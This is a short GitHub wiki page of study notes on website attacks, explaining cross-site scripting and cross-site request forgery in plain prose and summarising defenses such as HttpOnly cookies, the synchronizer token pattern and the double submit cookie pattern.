Skip to content

Website Attacks

Jump to bottom
txgz999 edited this page Aug 17, 2019 · 14 revisions

XSS: Cross-Site Scripting

Hackers inject their code into our web page, when their code runs do some malicious things to hour web site or to our user, for example stealing our web site data. The goal to protect our web site from this attack is to prevent such code from executing.

Make cookie httponly is a way to prevent hacker’s code from accessing and stealing cookie data.

CSRF: Cross-Site Request Forgery

Attackers allure our user to submit request to our website unintentionally to cause some damage to the user or to the website. The submit form or submit code comes form attacker, but it submit request to our website.

The prerequisite for this attack to work is the user has logged in to our website, and their identity is stored in cookie.

It utilizes the following nature of the cookie: cookie sends with request to site that belongs to the domain this cookie belongs to, regardless the origin of the document that submits the request.

Such a request can be made by user clicking a hyperlink in an email he receives, or by a script that runs when user load a document.

While we need to know what CSRF attack can do, we also need to understand what it cannot do

CSRF Attack Solutions

  • Harsha Kavinda, Synchronizer Token Pattern: when user logs in, generate a token and set it as a session variable. Then in every form sends to user, add that session variable value in a hidden field in the form. Once receives the form data submitted by user, check if that hidden field value matches the session variable value
  • Harsha Kavinda, Double Submit Cookie Pattern: when user logs in, generate a token and put it in cookie. Then in every form sends to user, add that cookie value in a hidden field in the form. Once receives the form data submitted by user, check if that hidden field value matches the cookie value

Clone this wiki locally